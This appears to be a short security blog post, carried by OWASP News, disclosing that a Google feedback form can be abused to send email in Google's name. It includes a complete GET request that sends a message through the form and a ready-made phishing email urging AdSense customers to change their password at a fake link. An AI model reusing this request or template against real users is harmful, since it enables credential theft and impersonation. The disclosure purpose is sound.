I really feel Google should know better than this. Check out this form residing on the Google domain[1]. It allows phishers to utilize the Google e-mail interface to phish Google customers in a very simple way. Let's say we set up a Google pages account or some other domain were we create a page that looks like the Adsense interface where customers can change there login credentials. We then use the Google e-mail interface to send an e-mail in Google's name and phish people into visiting this website and collect the submitted credentials.

While this can be nasty, it doesn't stop there. I wonder what happens when G Mail's spam filter kicks in when one starts spamming through this e-mail interface, and the filter starts blocking Google's own e-mail addresses because of the large volume of e-mail that is coming from their own domain? It's probably also possible to get someone's e-mail address blacklisted this way.

Moreover the e-mail interface also accepts GET to submit the phishing e-mail:

http://services.google.com/feedback/adsensetour_email?

validate_form=yes&

FirstName=adsensecustomer&

Email=foobar%40gmail.com&

LastName=Sergey+Brin&

Company=security%40google.com&q_Answer=MESSAGE_HERE&

submit=Send+It

Message:

This is an important message to all our Adsense customers. Google needs to

verify your Adsense account, every year we require you to change your password in

order for your safety. You must change your password within 10 days or your account

will be suspended.



Follow this link to change your password:



http://googlepages.com/chgpass/	

[1] http://services.google.com/feedback/adsensetour_email?hl=
source: OWASP News